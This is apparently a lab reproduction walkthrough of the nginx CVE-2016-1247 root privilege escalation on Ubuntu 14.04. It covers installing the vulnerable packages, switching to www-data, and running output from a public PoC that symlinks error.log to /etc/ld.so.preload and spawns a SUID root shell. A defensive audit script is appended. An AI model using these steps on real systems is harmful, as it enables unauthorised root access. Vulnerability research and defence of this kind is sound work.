CVE-2016-1247 nginx privilege escalation: environment setup

nginx privilege escalation vulnerability

This is only a reproduction walkthrough and environment setup. For the detailed analysis, see the Knownsec article below, which is very thorough.
http://blog.knownsec.com/2016/11/nginx-exploit-deb-root-privesc-cve-2016-1247/

Installation notes

ubuntu 14.04 32bit
nginx 1.4.6-1ubuntu3

Reference:
http://bbs.77169.com/forum.php?mod=viewthread&tid=355577

Installation process

First I tried to install nginx 1.4.6-1ubuntu3, but it failed with an error.

nginx@ubuntu:~$ sudo apt-get install nginx=1.4.6-1ubuntu3
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
nginx : Depends: nginx-core (< 1.4.6-1ubuntu3.1~) but it is not going to be installed or
nginx-full (< 1.4.6-1ubuntu3.1~) but it is not going to be installed or
nginx-light (< 1.4.6-1ubuntu3.1~) but 1.4.6-1ubuntu3.7 is to be installed or
nginx-extras (< 1.4.6-1ubuntu3.1~) but it is not going to be installed or
nginx-naxsi (< 1.4.6-1ubuntu3.1~) but it is not going to be installed
E: Unable to correct problems, you have held broken packages.

So I tried installing nginx-full=1.4.6-1ubuntu3 first.

nginx@ubuntu:~$ sudo apt-get install nginx-full=1.4.6-1ubuntu3
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
nginx-full : Depends: nginx-common (= 1.4.6-1ubuntu3) but 1.4.6-1ubuntu3.7 is to be installed
E: Unable to correct problems, you have held broken packages.

So the installation order is:

sudo apt-get install nginx-common=1.4.6-1ubuntu3
sudo apt-get install nginx-full=1.4.6-1ubuntu3
sudo apt-get install nginx=1.4.6-1ubuntu3

The installed versions are:

nginx@ubuntu:~$ dpkg -l |grep nginx
ii nginx 1.4.6-1ubuntu3 all small, powerful, scalable web/proxy server
ii nginx-common 1.4.6-1ubuntu3 all small, powerful, scalable web/proxy server - common files
ii nginx-full 1.4.6-1ubuntu3 i386 nginx web/proxy server (standard version)

Check the directory permissions:

nginx@ubuntu:/var/log$ ls -ld ./nginx/
drwxr-x--- 2 www-data adm 4096 May 15 05:41 ./nginx/

The directory is owned by the www-data user, which shows the package is unpatched.

Running & reproducing

Start nginx:

nginx@ubuntu:~$ sudo nginx
nginx@ubuntu:~$ ps -A |grep nginx
10354 ? 00:00:00 nginx
10355 ? 00:00:00 nginx
10356 ? 00:00:00 nginx
10357 ? 00:00:00 nginx
10358 ? 00:00:00 nginx

Check the permissions of the files under log/nginx.

nginx@ubuntu:/var/log/nginx$ ll
total 8
drwxr-x--- 2 www-data adm 4096 May 15 06:04 ./
drwxrwxr-x 15 root syslog 4096 May 15 05:46 ../
-rw-r--r-- 1 root root 0 May 15 06:04 access.log
-rw-r--r-- 1 root root 0 May 15 06:04 error.log

error.log is owned by root and belongs to the root group.
If it were owned by www-data, you could first kill nginx, delete all files under the nginx log directory, and then restart nginx.

Switching to www-data

Because the account is in nologin state, you cannot switch to it directly; /etc/passwd has to be modified.

nginx@ubuntu:/var/log/nginx$ gedit /etc/passwd
### to /bin/bash
www-data:x:33:33:www-data:/var/www:/bin/bash

Switch:

nginx@ubuntu:~/Desktop$ su
Password:
root@ubuntu:/home/nginx/Desktop# sudo www-data
sudo: www-data: command not found
root@ubuntu:/home/nginx/Desktop# su www-data
www-data@ubuntu:/home/nginx/Desktop$

Running the PoC

www-data@ubuntu:/home/nginx/Desktop$ ./nginxed-root.sh /var/log/nginx/error.log 
[......]
[+] Starting the exploit as:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 www-data www-data 986672 May 15 06:11 /tmp/nginxrootsh

[+] The server appears to be (N)jinxed (writable logdir) ! :) Symlink created at:
lrwxrwxrwx 1 www-data www-data 18 May 15 06:11 /var/log/nginx/error.log -> /etc/ld.so.preload

[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am...

Switch to root and force a log rotation:

root@ubuntu:/var/log/nginx# /usr/sbin/logrotate -vf /etc/logrotate.d/nginx

Got root:

[+] The server appears to be (N)jinxed (writable logdir) ! :) Symlink created at: 
lrwxrwxrwx 1 www-data www-data 18 May 15 06:11 /var/log/nginx/error.log -> /etc/ld.so.preload

[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am...


[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges:
-rw-r--r-- 1 www-data root 19 May 15 06:12 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
-rwsrwxrwx 1 root root 986672 May 15 06:11 /tmp/nginxrootsh

[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 986672 May 15 06:11 /tmp/nginxrootsh

The server is (N)jinxed ! ;) Got root via Nginx!

[+] Spawning the rootshell /tmp/nginxrootsh now!

nginxrootsh-4.3#
nginxrootsh-4.3#
nginxrootsh-4.3# whoami
root
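As an added defensive example that is not part of the original post, the POSIX shell script below checks the three conditions this walkthrough turns on: the log directory owned by www-data (the unpatched state seen in the dpkg check above), a log file replaced by a symlink, and /etc/ld.so.preload naming a library outside the system library tree such as /tmp/privesclib.so. The function names are mine, and the defaults www-data and /var/log/nginx are assumed from the page.

```shell
#!/bin/sh
# Constructed defensive check for the CVE-2016-1247 preconditions and artefacts shown
# on this page (added example, not the page's or the nginx package's own code).
# Assumed defaults: web user www-data, log dir /var/log/nginx, both taken from the page.
WEB_USER="${WEB_USER:-www-data}"
LOG_DIR="${LOG_DIR:-/var/log/nginx}"

# 0 when an `ls -ld` line shows the log directory owned by the web user: the
# unpatched state, since a worker that can write the directory can swap
# error.log for a symlink that nginx reopens as root after logrotate.
logdir_owned_by_webuser() {
    owner=$(printf '%s\n' "$1" | awk '{print $3}')
    [ "$owner" = "$2" ]
}

# 0 when an `ls -l` line for a log file describes a symlink (mode starts with 'l');
# a genuine log is never a symlink, so this is the trace the PoC leaves behind.
logfile_is_symlink() {
    case "$1" in
        l*) return 0 ;;
        *)  return 1 ;;
    esac
}

# 0 when /etc/ld.so.preload content (passed as text) names a library outside
# /lib or /usr/lib, e.g. /tmp/privesclib.so; blank lines are ignored.
preload_has_foreign_entry() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*$' | grep -qvE '^/(usr/)?lib/'
}

# Live audit of this host: prints each finding and returns the finding count.
audit_host() {
    findings=0
    if [ -d "$LOG_DIR" ] && logdir_owned_by_webuser "$(ls -ld "$LOG_DIR")" "$WEB_USER"; then
        echo "FINDING: $LOG_DIR is owned by $WEB_USER (remediate: root ownership, e.g. chown root:adm)"
        findings=$((findings + 1))
    fi
    for f in "$LOG_DIR"/*.log; do
        [ -e "$f" ] || [ -L "$f" ] || continue
        if logfile_is_symlink "$(ls -l "$f")"; then
            echo "FINDING: $f is a symlink -> $(readlink "$f")"
            findings=$((findings + 1))
        fi
    done
    if [ -r /etc/ld.so.preload ] && preload_has_foreign_entry "$(cat /etc/ld.so.preload)"; then
        echo "FINDING: /etc/ld.so.preload loads a library outside /lib or /usr/lib"
        findings=$((findings + 1))
    fi
    return "$findings"
}
```

Run `audit_host` as root on the host; a zero return means none of the three indicators was found.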

To learn more about this vulnerability, see:

https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
http://blog.knownsec.com/2016/11/nginx-exploit-deb-root-privesc-cve-2016-1247/
